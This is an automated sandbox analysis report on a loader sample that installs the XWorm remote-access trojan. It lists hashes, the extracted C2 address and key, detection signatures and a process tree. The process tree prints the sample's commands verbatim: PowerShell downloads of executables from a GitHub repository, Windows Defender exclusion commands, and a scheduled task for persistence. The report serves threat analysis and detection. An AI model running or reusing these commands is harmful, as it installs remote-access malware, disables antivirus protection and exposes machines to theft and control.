Analysis
-
max time kernel
848s -
max time network
901s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
02/03/2025, 19:08
Static task
static1
General
-
Target
ExodusLoader.exe
-
Size
89KB
-
MD5
2f3405fa61bec944ed9d869adb6a37e3
-
SHA1
4a3c839b899809ba89a99eaadecf4da6d71e8256
-
SHA256
ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234
-
SHA512
72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0
-
SSDEEP
1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg
Malware Config
Extracted
xworm
5.0
137.184.74.73:5000
Y2rnj2CSRObOXXLb
-
Install_directory
%ProgramData%
-
install_file
System.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4640-73-0x0000000001430000-0x000000000143E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 8 3548 powershell.exe 12 3548 powershell.exe 21 2788 powershell.exe 22 2788 powershell.exe -
pid Process 3548 powershell.exe 2788 powershell.exe 4112 powershell.exe 2340 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 12 3548 powershell.exe 22 2788 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation ExodusInject.exe Key value queried \REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000\Control Panel\International\Geo\Nation AggregatorHost.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk AggregatorHost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk AggregatorHost.exe -
Executes dropped EXE 17 IoCs
pid Process 3060 ExodusInject.exe 1704 Exodus.exe 4640 AggregatorHost.exe 1184 System.exe 820 System.exe 2708 System.exe 1332 System.exe 1316 System.exe 1864 System.exe 2552 System.exe 2196 System.exe 3776 System.exe 4780 System.exe 4320 System.exe 2600 System.exe 2076 System.exe 3312 System.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 9 raw.githubusercontent.com 12 raw.githubusercontent.com 22 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExodusLoader.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 412 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2956 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3548 powershell.exe 3548 powershell.exe 2788 powershell.exe 2788 powershell.exe 4112 powershell.exe 4112 powershell.exe 2340 powershell.exe 2340 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3548 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 3060 ExodusInject.exe Token: SeBackupPrivilege 452 vssvc.exe Token: SeRestorePrivilege 452 vssvc.exe Token: SeAuditPrivilege 452 vssvc.exe Token: SeDebugPrivilege 4112 powershell.exe Token: SeIncreaseQuotaPrivilege 4112 powershell.exe Token: SeSecurityPrivilege 4112 powershell.exe Token: SeTakeOwnershipPrivilege 4112 powershell.exe Token: SeLoadDriverPrivilege 4112 powershell.exe Token: SeSystemProfilePrivilege 4112 powershell.exe Token: SeSystemtimePrivilege 4112 powershell.exe Token: SeProfSingleProcessPrivilege 4112 powershell.exe Token: SeIncBasePriorityPrivilege 4112 powershell.exe Token: SeCreatePagefilePrivilege 4112 powershell.exe Token: SeBackupPrivilege 4112 powershell.exe Token: SeRestorePrivilege 4112 powershell.exe Token: SeShutdownPrivilege 4112 powershell.exe Token: SeDebugPrivilege 4112 powershell.exe Token: SeSystemEnvironmentPrivilege 4112 powershell.exe Token: SeRemoteShutdownPrivilege 4112 powershell.exe Token: SeUndockPrivilege 4112 powershell.exe Token: SeManageVolumePrivilege 4112 powershell.exe Token: 33 4112 powershell.exe Token: 34 4112 powershell.exe Token: 35 4112 powershell.exe Token: 36 4112 powershell.exe Token: SeDebugPrivilege 2340 powershell.exe Token: SeIncreaseQuotaPrivilege 2340 powershell.exe Token: SeSecurityPrivilege 2340 powershell.exe Token: SeTakeOwnershipPrivilege 2340 powershell.exe Token: SeLoadDriverPrivilege 2340 powershell.exe Token: SeSystemProfilePrivilege 2340 powershell.exe Token: SeSystemtimePrivilege 2340 powershell.exe Token: SeProfSingleProcessPrivilege 2340 powershell.exe Token: SeIncBasePriorityPrivilege 2340 powershell.exe Token: SeCreatePagefilePrivilege 2340 powershell.exe Token: SeBackupPrivilege 2340 powershell.exe Token: SeRestorePrivilege 2340 powershell.exe Token: SeShutdownPrivilege 2340 powershell.exe Token: SeDebugPrivilege 2340 powershell.exe Token: SeSystemEnvironmentPrivilege 2340 powershell.exe Token: SeRemoteShutdownPrivilege 2340 powershell.exe Token: SeUndockPrivilege 2340 powershell.exe Token: SeManageVolumePrivilege 2340 powershell.exe Token: 33 2340 powershell.exe Token: 34 2340 powershell.exe Token: 35 2340 powershell.exe Token: 36 2340 powershell.exe Token: SeDebugPrivilege 4640 AggregatorHost.exe Token: SeDebugPrivilege 4640 AggregatorHost.exe Token: SeDebugPrivilege 1184 System.exe Token: SeDebugPrivilege 820 System.exe Token: SeDebugPrivilege 2708 System.exe Token: SeDebugPrivilege 1332 System.exe Token: SeDebugPrivilege 1316 System.exe Token: SeDebugPrivilege 1864 System.exe Token: SeDebugPrivilege 2552 System.exe Token: SeDebugPrivilege 2196 System.exe Token: SeDebugPrivilege 3776 System.exe Token: SeDebugPrivilege 4780 System.exe Token: SeDebugPrivilege 4320 System.exe Token: SeDebugPrivilege 2600 System.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4752 wrote to memory of 1332 4752 ExodusLoader.exe 85 PID 4752 wrote to memory of 1332 4752 ExodusLoader.exe 85 PID 1332 wrote to memory of 3548 1332 cmd.exe 86 PID 1332 wrote to memory of 3548 1332 cmd.exe 86 PID 1332 wrote to memory of 2788 1332 cmd.exe 87 PID 1332 wrote to memory of 2788 1332 cmd.exe 87 PID 1332 wrote to memory of 3060 1332 cmd.exe 92 PID 1332 wrote to memory of 3060 1332 cmd.exe 92 PID 1332 wrote to memory of 1704 1332 cmd.exe 93 PID 1332 wrote to memory of 1704 1332 cmd.exe 93 PID 3060 wrote to memory of 4112 3060 ExodusInject.exe 97 PID 3060 wrote to memory of 4112 3060 ExodusInject.exe 97 PID 3060 wrote to memory of 2340 3060 ExodusInject.exe 100 PID 3060 wrote to memory of 2340 3060 ExodusInject.exe 100 PID 3060 wrote to memory of 4724 3060 ExodusInject.exe 105 PID 3060 wrote to memory of 4724 3060 ExodusInject.exe 105 PID 4724 wrote to memory of 412 4724 cmd.exe 107 PID 4724 wrote to memory of 412 4724 cmd.exe 107 PID 4640 wrote to memory of 2956 4640 AggregatorHost.exe 109 PID 4640 wrote to memory of 2956 4640 AggregatorHost.exe 109 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C7A5.tmp\C7A6.tmp\C7A7.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF472.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Exodus.exe"C:\Users\Admin\AppData\Local\Temp\Exodus.exe"3⤵
- Executes dropped EXE
PID:1704
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:452
-
C:\Users\Admin\AppData\Roaming\AggregatorHost.exe"C:\Users\Admin\AppData\Roaming\AggregatorHost.exe"1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2956
-
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:820
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
PID:2076
-
C:\ProgramData\System.exe"C:\ProgramData\System.exe"1⤵
- Executes dropped EXE
PID:3312
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ad3b892cd0e5d3d10ca1d7ce9f858c6c
SHA1f6d3dccdcd6039bd70d243e2aeddd286b2b61506
SHA256a1ac1f065ecfcaaded0544844106cfa4aca48acad49fd347eb238561a91655b0
SHA5122f218f25619b728378b6aad3899eaf4e1dee71506ad8ae5a4a504e6f137c828d6d74adad9b75e9e5b0290cafb1672240359dfc109ebe9be44c21e37887a90726
-
Filesize
2KB
MD5ed30ca9187bf5593affb3dc9276309a6
SHA1c63757897a6c43a44102b221fe8dc36355e99359
SHA25681fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA5121df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize
1KB
MD578153de63c467e206b9b565dadeccfe6
SHA129ba7d083efb8e7c215d09dddd937ed8292d3f59
SHA2562cf859da0d2b6da20d4f3ce8c1d497ac9152c90b9640f92d033b0a679d2e3f93
SHA512913622de8c0885996a75f640b6e38300a0ca88d34f176c9f61eb5feb5c5be3e03868d3fceeb8c46b253d2977a2d8898cc4b10042940844f1d0af8a65b82f1a94
-
Filesize
1KB
MD545740ec1280c415aa8d22df249e24cd9
SHA1c586c033f7d17e1fee1334a44cda617f9c211a9d
SHA256a139d48ea1f1b8f146e385e87795b47ef7ebfc22c223096260bdb2270a856e2b
SHA5122548ef6d73ce7f70a1dae39b7da27d989678e6e329053ff8359582abcaa41282201555c08a4a5a1daba1663fdd6c599587d5f6df3adb26e4a5df07d0d217eaa2
-
Filesize
1KB
MD564371a8a8da1b62945601ed266991615
SHA1f91874501371d7f1da01b1370877599f1b3db00c
SHA256b477f4b6da60426ea06c449968231130f5263af707d7342c4596888cfc2339d6
SHA5123a0c68608bbac227aded90838cf62da7a9b867d151ecf4bd293848618b1bd72e72f007435c213960adac6a7613823b405b9254a48ae0b71d7ab4148652ecbf44
-
Filesize
491B
MD554436d8e8995d677f8732385734718bc
SHA1246137700bee34238352177b56fa1c0f674a6d0b
SHA25620c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3
SHA51257ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448
-
Filesize
507KB
MD5470ccdab5d7da8aafc11490e4c71e612
SHA1bc540c0ba7dcb0405a7b6c775f0a1b585d51c4b3
SHA256849c0420722c1dabb927ff0ab70375bc1197ba73a7f04885460b609392bd319c
SHA5126b3a09b785c02a57f6330cd6610f8a78b1f6a1689c14a190a9af4ad4ab4666f8a77d75c4c85a3af04693effdc970440ce8d62a4132f66471aaa250f9d90f2f7b
-
Filesize
227KB
MD538b7704d2b199559ada166401f1d51c1
SHA13376eec35cd4616ba8127b976a8667e7a0aac87d
SHA256153825af8babb75361f4af359bfdd5e95cbdc7f263db5c4e70ac1da8f36bc564
SHA51207b828073c8f80c5498501c8f64decb5effa702c8bc3d60a2f7d5de36d493b469cbbf413fb0c92c0aadd6ee139bfb75f3b9e936230212d42e57d2ec5671e9b27
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
164B
MD59d27228c5b8759f74c08e227b135913a
SHA1cd23e87a1908aaa4ca2ac18dd6d841acfcb5709e
SHA256905a89dd5729e1f454a43d337294f42df50eca51ac6309076f64d913600aece0
SHA512ecff173877719bdad794ae7245e7ab639773f75b8437814bb27dfb0e3b1b6d21c3b07e3c483103a9fce7a52a60b93b9b90673e7e9d08cf79c23c53d9c580e16d